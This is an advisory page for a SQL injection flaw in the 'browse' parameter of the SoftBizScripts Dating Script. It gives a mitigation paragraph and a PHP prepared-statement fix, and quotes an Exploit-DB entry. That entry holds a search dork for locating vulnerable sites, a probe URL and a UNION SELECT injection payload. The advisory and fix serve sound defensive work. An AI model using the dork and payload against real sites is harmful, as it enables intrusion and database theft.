vendor: Dating Script
by: 41.w4r10r
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Dating Script
Affected Version From: Not specified
Affected Version To: Not specified
Patch Exists: NO
Platforms Tested: Apache/Unix
2010

SoftBizScripts Dating Script SQL Injection Vulnerability

The SoftBizScripts Dating Script is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting malicious SQL queries into the 'browse' parameter of the search_results.php page. This allows the attacker to retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input and use prepared statements or parameterized queries to prevent SQL Injection attacks.
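
The mitigation above, sketched as an added example (not the vendor's code and not part of the original advisory): the 'browse' value is validated as an integer and bound into a prepared statement, then the request shapes listed in the advisory are run through it. Table, column and function names are hypothetical, and an in-memory SQLite database with constructed rows stands in for the real backend (requires PHP 8 with pdo_sqlite).

```php
<?php
// Added example: table, column and function names are hypothetical;
// the real search_results.php source is not shown on the page.
declare(strict_types=1);

// Constructed sample data in an in-memory SQLite database so the script runs offline.
function demo_db(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE profiles (id INTEGER PRIMARY KEY, category_id INTEGER, name TEXT)');
    $pdo->exec("INSERT INTO profiles (category_id, name) VALUES (1, 'alice'), (1, 'bob'), (2, 'carol')");
    return $pdo;
}

// Strict allow-list check: 'browse' must be a short run of digits, nothing else.
function parse_browse(mixed $raw): ?int {
    if (!is_string($raw) || preg_match('/\A[0-9]{1,9}\z/', $raw) !== 1) {
        return null;
    }
    return (int) $raw;
}

// The value is bound as a typed parameter and never concatenated into the SQL text.
function search_profiles(PDO $pdo, mixed $rawBrowse): ?array {
    $browse = parse_browse($rawBrowse);
    if ($browse === null) {
        return null; // caller should answer HTTP 400 and log the request
    }
    $stmt = $pdo->prepare('SELECT id, name FROM profiles WHERE category_id = :browse ORDER BY id');
    $stmt->bindValue(':browse', $browse, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN, 1); // column 1 = name
}

$pdo = demo_db();
// Inputs: one legitimate value, then the two request shapes listed in the advisory
// (the UNION string is shortened here; '+' in a URL decodes to a space).
$inputs = ['1', "1'", '-1 union select 1,version(),3--'];
foreach ($inputs as $input) {
    $rows = search_profiles($pdo, $input);
    echo str_pad(var_export($input, true), 40),
        $rows === null ? 'rejected' : 'rows: ' . implode(',', $rows), PHP_EOL;
}
```

Rejected values are worth logging with the client address and full query string, since a quote character or SQL keyword in a parameter that should be numeric is a useful detection signal.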

Exploit-DB raw data:

# Exploit Title: SoftBizScripts Dating Script SQL Injection Vulnerability
# Date: 29-4-2010
# Author: 41.w4r10r
# Vendor Link : http://softbizscripts.com/
# Version: Web Application
# Tested on: Apache/Unix
# CVE : [if exists]
# Dork :  inurl:"search_results.php?browse=1"
# Code :
---------------------------------------------------------------------------------------
############################################################################
#Greetz to all Andhra Hackers and ICW Members [Indian Cyber Warriors]
#Thanks: SaiSatish,FB1H2S,Godwin_Austin,Micr0,Harin,Jappy,Dark_Blue,sid3^3f3c7
#Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d
#Catch us at www.andhrahackers.com or www.teamicw.in
############################################################################



Exploited Link :

http://example.com/search_results.php?browse=1'


example:

http://[site]/search_results.php?browse=-1+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,version(),6,7,8,9--




#41.w4r10r mailto:41.w4r10r@andhrahackers.com